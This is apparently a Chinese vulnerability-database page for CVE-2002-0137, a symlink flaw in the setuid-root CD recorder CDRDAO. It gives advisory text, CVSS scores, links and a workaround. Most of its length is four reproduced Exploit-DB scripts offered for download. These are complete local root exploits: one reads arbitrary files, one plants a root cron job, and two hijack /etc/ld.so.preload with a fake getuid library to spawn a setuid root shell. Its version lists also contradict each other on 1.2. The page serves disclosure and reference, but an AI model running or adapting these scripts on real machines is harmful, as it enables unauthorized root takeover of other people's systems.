CVE-2002-0137
CVSS7.2
发布时间 :2002-03-25 00:00:00
修订时间 :2016-10-17 22:16:28
NMCOES    

[原文]CDRDAO 1.1.4 and 1.1.5 allows local users to overwrite arbitrary files via a symlink attack on the $HOME/.cdrdao configuration file.


[CNNVD]CDRDAO Home目录配置文件符号链接漏洞(CNNVD-200203-055)

        
        CDRDAO是一个运行于Linux和Unix操作系统的免费、开放源码的CD刻录软件包。它由Andreas Mueller维护。
        当CDRDAO保存它的配置文件.cdrdao到用户的home目录,文件以root所有权保存。在保存配置文件时,CDRDAO没有检查以前是否存在这个文件($HOME/.cdrdao)。而CDRDAO执行程序通常以setuid root安装,如果用户给这个文件建立一个符号链接,将可能覆盖root属主的文件甚至可能以root身份执行命令。
        

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:andreas_mueller:cdrdao:1.1.4
cpe:/a:andreas_mueller:cdrdao:1.1.5

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0137
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0137
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200203-055
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=101102759631000&w=2
(UNKNOWN)  BUGTRAQ  20020112 cdrdao insecure filehandling
http://www.securityfocus.com/bid/3865
(UNKNOWN)  BID  3865

- 漏洞信息

CDRDAO Home目录配置文件符号链接漏洞
高危 访问验证错误
2002-03-25 00:00:00 2005-10-20 00:00:00
本地  
        
        CDRDAO是一个运行于Linux和Unix操作系统的免费、开放源码的CD刻录软件包。它由Andreas Mueller维护。
        当CDRDAO保存它的配置文件.cdrdao到用户的home目录,文件以root所有权保存。在保存配置文件时,CDRDAO没有检查以前是否存在这个文件($HOME/.cdrdao)。而CDRDAO执行程序通常以setuid root安装,如果用户给这个文件建立一个符号链接,将可能覆盖root属主的文件甚至可能以root身份执行命令。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 暂时去掉CDRDAO的suid root属性。
         # chmod a-s /usr/bin/cdrdao
        厂商补丁:
        CDRDAO
        ------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://cdrdao.sourceforge.net

- 漏洞信息 (21216)

CDRDAO 1.1.x Home Directory Configuration File Symbolic Link Vulnerability (1) (EDBID:21216)
linux local
2002-01-13 Verified
0 Anonymous
N/A [点击下载]
source: http://www.securityfocus.com/bid/3865/info

CDRDAO is a freely available, open source CD recording software package available for the Unix and Linux Operating Systems. It is maintained by Andreas Mueller.

When CDRDAO saves it's configuration to the .cdrdao file in a user's home directory, the file is saved with root ownership. Additionally, CDRDAO does not check for the previous existence of this file. Since the cdrdao executable is typically installed setuid root, it is possible for a user to create this file as a symbolic link, which could result in the overwriting of root-owned files, or potentially allow the user execute commands as root.

#!/bin/sh

if [ "$1" ]; then
	cat > /tmp/t.c <<EOF
#include <stdio.h>
int     main()
{
	int     i;
	while (fscanf(stdin, "%i", &i) > 0)
	{
		printf("%c%c", (i & 0xff00) >> 8, i & 0xff);
	}
	return 0;
}
EOF
	cat > /tmp/t.toc <<EOF
CD_ROM
TRACK MODE1_RAW
FILE "$1" 0
EOF
	gcc /tmp/t.c -o /tmp/show
	echo `cdrdao show-data -v 0 --force /tmp/t.toc 2>&1 | grep -v WARNING | sed 's/.*://g' ` | /tmp/show
	rm -f /tmp/t.c /tmp/show /tmp/t.toc
else
	echo "Syntax: $0 filename"
fi		

- 漏洞信息 (21217)

CDRDAO 1.1.x Home Directory Configuration File Symbolic Link Vulnerability (2) (EDBID:21217)
linux local
2002-01-13 Verified
0 atomi
N/A [点击下载]
source: http://www.securityfocus.com/bid/3865/info
 
CDRDAO is a freely available, open source CD recording software package available for the Unix and Linux Operating Systems. It is maintained by Andreas Mueller.
 
When CDRDAO saves it's configuration to the .cdrdao file in a user's home directory, the file is saved with root ownership. Additionally, CDRDAO does not check for the previous existence of this file. Since the cdrdao executable is typically installed setuid root, it is possible for a user to create this file as a symbolic link, which could result in the overwriting of root-owned files, or potentially allow the user execute commands as root.

#!/bin/bash

## cdrdaohack.sh by Jens "atomi" Steube

ROOTEXECDIR="/etc/cron.d/cdr"
CDRDAO="/usr/bin/cdrdao"
USERCONF="$HOME/.cdrdao"

echo "Testing $CDRDAO"
if [ ! -u $CDRDAO ]; then
  echo "ERROR: $CDRDAO is not setuid or does not exist"
  exit 1
fi

echo "Generating Helper Files"

cat > /tmp/daosh.c << EOF
int main () { 
setuid(0); setgid(0);
unlink("/tmp/dao.sh");
unlink("/tmp/daosh.c");
unlink("/etc/cron.d/cdr");
unlink("$HOME/.cdrdao");
execl("/bin/bash","bash","-i",0);
}
EOF

cat > /tmp/dao.sh << EOF
cc -o /tmp/daosh /tmp/daosh.c >/dev/null 2>&1
chown root /tmp/daosh >/dev/null 2>&1
chgrp root /tmp/daosh >/dev/null 2>&1
chmod 6755 /tmp/daosh >/dev/null 2>&1
exit 0
EOF

chmod 700 /tmp/dao.sh

echo "Backing up original $USERCONF file to $USERCONF.orig"
mv $USERCONF $USERCONF.orig >/dev/null 2>&1

echo "Creating Symlink on $USERCONF to $ROOTEXECDIR"
ln -s $ROOTEXECDIR $USERCONF

echo "Executing $CDRDAO"

$CDRDAO write --save --device '
* * * * * root /tmp/dao.sh >/dev/null 2>&1
#' --buffers '
' . >/dev/null 2>&1

echo "Waiting for Rootshell, wait at least 3 minutes"
while [ ! -u /tmp/daosh ]; do
  echo -n "."
  sleep 1
done

echo
echo "Entering Rootshell and removing Helper Files"
echo "Have Phun :-)"
/tmp/daosh
		

- 漏洞信息 (21218)

CDRDAO 1.1.x Home Directory Configuration File Symbolic Link Vulnerability (3) (EDBID:21218)
linux local
2002-01-13 Verified
0 Anonymous
N/A [点击下载]
source: http://www.securityfocus.com/bid/3865/info
  
CDRDAO is a freely available, open source CD recording software package available for the Unix and Linux Operating Systems. It is maintained by Andreas Mueller.
  
When CDRDAO saves it's configuration to the .cdrdao file in a user's home directory, the file is saved with root ownership. Additionally, CDRDAO does not check for the previous existence of this file. Since the cdrdao executable is typically installed setuid root, it is possible for a user to create this file as a symbolic link, which could result in the overwriting of root-owned files, or potentially allow the user execute commands as root.

#!/bin/sh
# cdrdao local root exploit
# newbug [at] chroot.org
# IRC: irc.chroot.org #chroot
# May 2005
echo "cdrdao private exploit"
echo "This exploit only for Mandrake series"
echo "newbug [at] chroot.org"
echo "May 2005"

echo "checking if cdrdao is setuid ...";
if [ ! -u /usr/bin/cdrdao ]; then
        echo "[-] Failed";
        exit
fi
echo "[+] done.";
echo "checking if /etc/ld.so.preload already exist ..."
if [ -f /etc/ld.so.preload ]; then
        echo "[-] Failed."
        exit
else
        echo "[+] done."
fi

echo "checking if ~/.cdrdao already exist ..."
if [ -f ~/.cdrdao ]; then
        rm -rf ~/.cdrdao
fi
echo "[+] done."

cd /tmp

echo "preparing hook library ..."
cat >ld.so.c<<EOF
#include <stdlib.h>
uid_t getuid()
{
        return 0;
}
EOF
echo "[+] done."
echo "preparing shell program ..."
cat >sh.c <<EOF
#include <stdio.h>
#include <unistd.h>

int main(int argc,char **argv)
{
        setreuid(0,0);
        setgid(0);

        unlink("/tmp/ld.so");
        if(getuid())
        {
                printf("[-] Failed.\n");
                unlink(argv[0]);
                exit(0);
        }
        printf("[+] Congratulation, You win the game !!\n");
        unlink("/etc/ld.so.preload");

        execl("/bin/bash","bash",(char *)0);

        return 0;
}
EOF
echo "[+] done."

echo "link .cdrdao ==> /etc/ld.so.preload ..."
ln -sf /etc/ld.so.preload ~/.cdrdao
echo "[+] done."

echo "compile hook library ..."
gcc -shared -o ld.so ld.so.c
echo "[+] done."
echo "compile shell program ..."
gcc -o sh sh.c
echo "[+] done."

umask 0

echo "run cdrdao ..."
cdrdao unlock --save >/dev/null 2>&1
echo "[+] done."

echo "checking if /etc/ld.so.preload created successful..."
if [ -f /etc/ld.so.preload ]; then
        echo "[+] done."
else
        echo "[-] Failed."
        exit
fi
echo "/tmp/ld.so">/etc/ld.so.preload
rm -f /tmp/sh.c
rm -f /tmp/ld.so.c
su -c "chown root.root /tmp/sh;chmod 4755 /tmp/sh" >/dev/null 2>&1
echo "!@#\$@%#$%#$%!@%^"
/tmp/sh
		

- 漏洞信息 (21219)

CDRDAO 1.1.x Home Directory Configuration File Symbolic Link Vulnerability (4) (EDBID:21219)
linux local
2002-01-13 Verified
0 Karol Wiesek
N/A [点击下载]
source: http://www.securityfocus.com/bid/3865/info
   
CDRDAO is a freely available, open source CD recording software package available for the Unix and Linux Operating Systems. It is maintained by Andreas Mueller.
   
When CDRDAO saves it's configuration to the .cdrdao file in a user's home directory, the file is saved with root ownership. Additionally, CDRDAO does not check for the previous existence of this file. Since the cdrdao executable is typically installed setuid root, it is possible for a user to create this file as a symbolic link, which could result in the overwriting of root-owned files, or potentially allow the user execute commands as root.



#!/bin/sh
DIR=`pwd`
echo ""
echo "cdrdao local root exploit - gr doesn't protect you this time"
echo "Karol Wiêsek <appelast*drumnbass.art.pl>"
echo ""
sleep 2
umask 000
echo -n "[*] Checking if /etc/ld.so.preload doesn't exist ... "
if [ -f /etc/ld.so.preload ]; then
echo "WRONG"
echo "/etc/ld.so.preload exists, write another exploit ;P"
exit
else
echo "OK"
fi
echo -n "[*] Checking if su is setuid ... "
if [ -u /bin/su ];then
echo "OK"
else
echo "WRONG"
exit
fi
echo -n "[*] Creating evil *uid() library ... "
cat > getuid_lib.c << _EOF
int getuid(void) {
	return 0; }
_EOF
gcc -o getuid_lib.o -c getuid_lib.c
ld -shared -o getuid_lib.so getuid_lib.o
rm -f getuid_lib.c getuid_lib.o
if [ -f ./getuid_lib.so ]; then
echo "OK"
else
echo "WRONG"
fi
echo -n "[*] Creating suidshell ... "
cat > suid.c << _EOF
int main(void) {
	setgid(0); setuid(0);
	unlink("./suid");
	execl("/bin/sh","sh",0); }
_EOF
gcc -o suid suid.c
rm -f suid.c
if [ -x ./suid ];then
echo "OK"
else
echo "WRONG"
exit
fi
echo -n "[*] Exploiting cdrdao ... "
ln -sf /etc/ld.so.preload $HOME/.cdrdao
if [ ! -L $HOME/.cdrdao ];then
echo "Could'n link to \$HOME/.cdrdao"
exit
fi
cdrdao unlock --save 2>/dev/null
>/etc/ld.so.preload
echo "$DIR/getuid_lib.so" > /etc/ld.so.preload
su - -c "rm /etc/ld.so.preload; chown root:root $DIR/suid; chmod +s $DIR/suid"
if [ -s ./suid ];then
echo "OK"
else
echo "WRONG"
exit
fi
rm -f getuid_lib.so
unlink $HOME/.cdrdao
echo "Entering rootshell ... ;]"
./suid
		

- 漏洞信息

9753
CDRDAO .cdrdao Symlink Arbitrary File Overwrite
Local Access Required Input Manipulation, Race Condition
Loss of Integrity Upgrade
Exploit Public Vendor Verified, Third-party Verified

- 漏洞描述

cdrdao contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The vulnerbility only exists if cdrdao is suid root. The issue is triggered when cdrdao saves its configuration settings to a user-accessible file, [$HOME]/.cdrdao, with root privileges. This allows a user to create a symlink to any file on the system and specify the data to be written to it. This flaw may lead to a loss of confidentiality, integrity and/or availability.

- 时间线

2002-01-12 Unknow
2002-01-12 Unknow

- 解决方案

Upgrade to version 1.2.0 or higher, as it has been reported to fix this vulnerability. A possible workaround is to remove the suid flag from the cdrdao binary.

- 相关参考

- 漏洞作者

- 漏洞信息

CDRDAO Home Directory Configuration File Symbolic Link Vulnerability
Access Validation Error 3865
No Yes
2002-01-13 12:00:00 2009-07-11 09:56:00
This vulnerability was announced by Jens Steube <jsteube@lastflood.com> via Bugtraq on January 13, 2002.

- 受影响的程序版本

CDRDAO CDRDAO 1.1.9
CDRDAO CDRDAO 1.1.5
- Debian Linux 2.3 sparc
- Debian Linux 2.3 powerpc
- Debian Linux 2.3 arm
- Debian Linux 2.3 alpha
- Debian Linux 2.3 68k
- Debian Linux 2.3
CDRDAO CDRDAO 1.1.4
CDRDAO CDRDAO 1.2

- 不受影响的程序版本

CDRDAO CDRDAO 1.2

- 漏洞讨论

CDRDAO is a freely available, open source CD recording software package available for the Unix and Linux Operating Systems. It is maintained by Andreas Mueller.

When CDRDAO saves it's configuration to the .cdrdao file in a user's home directory, the file is saved with root ownership. Additionally, CDRDAO does not check for the previous existence of this file. Since the cdrdao executable is typically installed setuid root, it is possible for a user to create this file as a symbolic link, which could result in the overwriting of root-owned files, or potentially allow the user execute commands as root.

- 漏洞利用

The following exploits are available:

- 解决方案

The vendor has addressed this issue is cdrdao version 1.2.0.


CDRDAO CDRDAO 1.1.4

CDRDAO CDRDAO 1.1.5

CDRDAO CDRDAO 1.1.9

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站